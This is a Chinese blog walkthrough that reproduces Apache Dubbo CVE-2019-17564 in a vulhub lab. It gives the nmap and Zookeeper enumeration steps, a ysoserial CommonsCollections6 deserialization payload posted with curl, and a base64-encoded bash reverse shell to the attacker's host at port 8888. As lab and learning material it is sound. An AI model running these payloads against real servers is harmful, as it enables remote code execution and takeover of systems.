Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)

已于 2023-08-25 20:29:58 修改
阅读量1k 收藏 2
点赞数 1
分类专栏: vulhub漏洞复现 文章标签: apache dubbo java
于 2023-08-25 20:26:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44862511/article/details/132502296
版权

目录

一.漏洞描述

二.影响范围

三.测试环境

四.搭建环境

1.vulhub靶场下载

2.docker-compose下载地址

3.服务启动

五.漏洞复现

1.查看开放端口

2.下载连接Zookeeper服务器

3.获取RPC接口

4.使用ysoserial工具生成payload

5.靶机验证

6.制作反弹shell的脚本

六.修复方案

一.漏洞描述

Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting. httpinvoker.HttpInvokerServiceExporter类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。

二.影响范围

Apache Dubbo 2.7.4及以前版本

三.测试环境

虚拟机 :VMware Workstation 15.5 Pro

网络模式 :VMnet8(能够相互通信即可)

Centos7(vulhub):IP地址:192.168.184.155

KALI :IP地址:192.168.184.136

Apache Dubbo 2.7.3

四.搭建环境

1.vulhub靶场下载

Vulhub - Docker-Compose file for vulnerability environment

2.docker-compose下载地址

Releases · docker/compose · GitHub

3.服务启动

一切都准备好之后就可以启动CVE-2019-17564了.

先cd到Dubbo目录下的CVE-2019-17564里面,然后使用docker-compose启动环境.

docker-compose  up  -d                 #安装并启动环境

docker   ps                         #查看当前正在运行的服务

可以看到Dubbo的端口为8080

ip  a                 #查看IP 我的IP为192.168.184.155

在浏览器端输入 你的ip+端口8080 访问服务,如果显示空白页面,则表示服务搭建成功!

五.漏洞复现

1.查看开放端口

打开我们最最最熟悉的kali系统

进入root用户:

(1) su  root                 #输入你的root密码

(2) sudo  -s                 #密码默认为kali

查看Dubbo服务开放的端口

nmap -p- 192.168.184.155 #查看开放端口,这里输入刚刚你在Centos查到的IP

对外开放了8080端口和2181端口,其中2181端口为Zookeeper的端口,我们本地下载Zookeeper,使用其中自带的zkCli建立一个交互式的shell来确定RPC接口的名称.

2.下载连接Zookeeper服务器

Zookeeper下载地址:

https://archive.apache.org/dist/zookeeper/zookeeper-3.3.3/zookeeper-3.3.3.tar.gz

如果下载慢或者失败,可以将连接复制到迅雷去下载.

下载好之后直接将文件拖至kali桌面.

tar  -xvf  zookeeper-3.3.3.tar.gz                 #解压 

3.获取RPC接口

解压后,进入Zookeeper执行bin目录下的zkCli.sh.

注意:这里的IP是你靶机(我的是Centos7)的IP , 不是kali的IP.

./zkCli.sh  -server  192.168.184.155:2181         #使用zkCli连接到这台Zookeeper服务器

 获取RPC接口名称.

4.使用ysoserial工具生成payload

ysoserial下载链接 :下载好之后直接将文件拖至kali桌面.

https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

接着用ysoserial工具生成CommonsCollections6的Payload作为POST Body发送到

http://192.168.184.155:8080/org.vulhub.api.CalcService即可触发反序列化漏洞:

java  -jar  ysoserial-master-2874a69f61-1.jar  CommonsCollections6  "touch /tmp/success" > 1.poc                 #生成一个创建success的1.poc

curl -XPOST --data-binary @1.poc http://192.168.184.155:8080/org.vulhub.api.CalcService #将Payload作为POST Body发送到靶机.这里记得换成你靶机的IP

 然后去靶机验证是否发送成功.

注意:这里在生成1.poc的时候也可能会出现以下情况:

 发生这种情况事因为你kali的JDK和编译ysoserial.jar的JDK不兼容导致.

参考文章:

解决Error while generating or serializing payload java.lang.reflect.InaccessibleObjetExceotion:Unable_徐长卿学网安的博客-CSDN博客

5.靶机验证

进入我们的Centos7靶机,查看容器内是否有success文件生成

docker  ps                 #查看正在启动的容器

docker  exec  -it  NAMES  bash         #查看容器

执行完以上kali的代码之后,靶机这边应该会出现一个success文件:

6.制作反弹shell的脚本

切换到kali这边,我们在这里制作反弹shell脚本.

进入棱角社区制作反弹shell , 这里用到的IP是kali的IP ,端口随便定一个8888

[~]#棱角 ::Edge.Forum*        #棱角社区

这里必须使用base64编码的形式,其他的反弹不了,我也不懂为什么,知道的同学可以将答案发到评论区.

java  -jar  ysoserial-master-2874a69f61-1.jar  CommonsCollections6  "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc         #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行

 curl -XPOST --data-binary @2.poc http://192.168.184.155:8080/org.vulhub.api.CalcService         #将Payload作为POST Body发送到靶机 , 注意,这里是你的靶机 IP

六.修复方案

升级到更高的版本.

徐长卿学网安
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 650
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
weixin_72543266的博客
04-22 1500
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
Apache Dubbo反序列化漏洞
YJ_12340的博客
05-24 841
Dubbo是阿里巴巴公司开源的一个高性能优秀的服务框架,使得应用可通过高性能的RPC实现服务的输出和输入功能,可以和Spring框架无缝集成。2020年06月23日, Apache Dubbo 官方发布了Apache Dubbo 远程代码执行的风险通告,该漏洞编号为,漏洞等级:高危。Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5400
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
web渗透学习目录-新手打开思路
weixin_42109829的博客
01-25 1561
一,基础学习 01.基础学习 [[编码总结]] [[JSON三种数据解析方法]] [[js加密,解密]] [[Internet保留地址和非保留地址、内网和公网、VNC和UltraVN]] 代理 [[SOCKS4、SOCKS5和HTTP代理]] [[Windows - Netch 使用教程]] [[Netch设置端口ip进行转发流量]] [[全能终端神器——MobaXterm]] 通信协议 [[IIOP-百度百科]] 互联网内部对象请求代理协议 二、信息收集 02.信息收集 1.[
通过 IDEA 黑掉你
云布道师
10-12 615
凌云时刻 · 技术导读:为什么需要反序列化?“最简单”的反序列化机制是怎么样实现的?有怎样的安全问题?作者 | 重构来源 | 凌云时刻(微信号:linuxpk)前言读者如果具备一定的 ...
CVE-2019-17564 Apache-Dubbo反序列化漏洞.md
04-12
CVE-2019-17564Apache-Dubbo反序列化漏洞
CVE-2019-17564 Apache Dubbo Http 反序列化漏洞深入分析 .pdf
09-05
2019年,Apache Dubbo暴露了一个严重的安全漏洞,即CVE-2019-17564,这是一个Http反序列化漏洞。该漏洞发生在启用HTTP远程处理的Dubbo应用程序中,攻击者可以通过发送包含恶意Java对象的POST请求,导致不安全的反...
dubbo-exp:Dubbo反序列化一键快速攻击测试工具,支持dubbo协议和http协议,支持hessian反序列化java原生反序列化
05-09
工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果使用者负责Dubbo反序列化测试工具使用帮助usage: java -jar exp.jar [OPTION]-h --help 帮助信息-l --list 输出所有gadget信息-g --gadget ...
Apache Dubbo远程代码执行漏洞(CVE-2021-43297)
10-25
Dubbo 升级到 2.6.12、2.7.15、3.0.5 及以上版本
dubbo-php-framework:适用于Apache Dubbo的php
04-22
dubbo-php-framework是用于PHP语言的RPC通讯框架。 它与Dubbo协议完全兼容,并且可以同时用作提供商终端和消费者终端。 使用zookeeper进行服务注册发现,并使用fastjson和hessian进行序列化。 介绍 php provider在多...
从0到1:理发店预约剪发小程序开发笔记(上)
CC同学呀
07-25 481
理发师可以在小程序上设置自己的可预约时间,价格,自我介绍,顾客可以根据理发师的日程安排选择合适的时间进行预约和支付。这样可以提高预约的效率,减少沟通成本,方便双方的安排。
Apache Doris + Paimon 快速搭建指南|Lakehouse 使用手册(二)
最新发布
SelectDB
07-25 482
湖仓一体(Data Lakehouse)融合了数据仓库的高性能、实时性以及数据湖的低成本、灵活性等优势,帮助用户更加便捷地满足各种数据处理分析的需求。在过去多个版本中,持续加深与数据湖的融合,已演进出一套成熟的湖仓一体解决方案。为便于用户快速入门,我们将通过系列文章介绍 Apache Doris 与各类主流数据湖格式及存储系统的湖仓一体架构搭建指南,包括 Hudi、Iceberg、Paimon、OSS、Delta Lake、Kudu、BigQuery 等。目前,我们已经发布了。
Apache Doris 2.1.5 版本正式发布
SelectDB
07-25 377
亲爱的社区小伙伴们,Apache Doris 2.1.5 版本已于 2024 年 7 月 24 日正式发布。2.1.5 版本在湖仓一体、多表物化视图、半结构化数据分析等方面进行了全面更新及改进,同时在倒排索引、查询优化器、查询引擎、存储管理等 10 余方向上完成了若干问题修复,欢迎大家下载使用。
Apache2服务介绍
m0_56363537的博客
07-23 1444
互联网上排名第一的 HTTP 服务器,Apache HTTP 服务器项目致力于开发和维护适用于现代操作系统(包括 UNIX 和 Windows)的开源 HTTP 服务器。该项目的目标是提供安全、高效且可扩展的服务器,该服务器提供与当前 HTTP 标准同步的 HTTP 服务。Apache HTTP 服务器(centos中命名为httpd)于 1995 年推出,自 1996 年 4 月以来一直是互联网上最受欢迎的 Web 服务器。2020 年 2 月,它作为一个项目迎来了 25 岁生日。
Apache Filnk----入门
xd__xy的博客
07-23 885
无界数据流:有定义流的开始,但没有定义流的结束;它们会无休止的产生数据:无界流的数据必须持续处理,即数据被摄取后需要立刻处理我们不能等到所有数据都到达再处理,因为输入是无限的。有界数据流:有定义流的开始,也有定义流的结束:有界流可以在摄取所有数据后再进行计算:有界流所有数据可以被排序,所以并不需要有序摄取:有界流处理通常被称为批处理。
Apache Dubbo:分布式服务框架的深度解析
Aaron_945的博客
07-24 796
同时,Dubbo 提供了丰富的服务治理功能,如负载均衡、集群容错、服务注册与发现等,为构建稳定、可靠、可扩展的分布式系统提供了有力支持。Dubbo 对注册中心的依赖,虽然简化了服务发现的复杂度,但也增加了系统的外部依赖和维护成本。但总的来说,随着微服务架构的日益普及,Dubbo 凭借其强大的功能和良好的性能,在分布式系统构建中仍然具有广泛的应用前景。服务提供者负责发布服务到注册中心,服务消费者从注册中心订阅服务,注册中心负责服务的注册与发现,监控中心则负责统计服务的调用次数和调用时间等。
windows服务器启动apache失败,提示请通过cmd命令行启动:net start apache
椰角科技的专栏
07-23 468
Windows Server 2012 R2服务器突然停止运行apche,启动apache失败,提示请通过cmd命令行启动:net start apache。进入服务器,打开本地服务,找到停止运行的apache,右键属性。进入服务里输入命令启动也不行,提示由于登录失败而无法启动服务。点击登录选项卡,登录身份选择:本地系统账户,然后确定。服务器www用户的密码异常或是权限被修改。最后点击启动apache即可。
CVE-2022-39198
08-09
CVE-2022-39198是影响Apache Dubbo的一个反序列化漏洞。该漏洞存在于Dubbo hessian-lite 3.2.12及之前的版本中。攻击者可以利用这个漏洞在目标系统上执行恶意代码。具体利用方法是通过反序列化操作,触发漏洞函数,从而执行恶意代码。 Apache Dubbo是一款高性能、轻量级的开源服务框架,提供了RPC通信与微服务处理两大关键能力。10月18日,Apache发布安全公告,修复了影响Apache Dubbo多个版本的一个反序列化漏洞CVE-2022-39198)。由于Dubbo hessian-lite 3.2.12及之前版本中存在反序列化漏洞,成功利用此漏洞可在目标系统上执行恶意代码。 0x02 影响范围。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值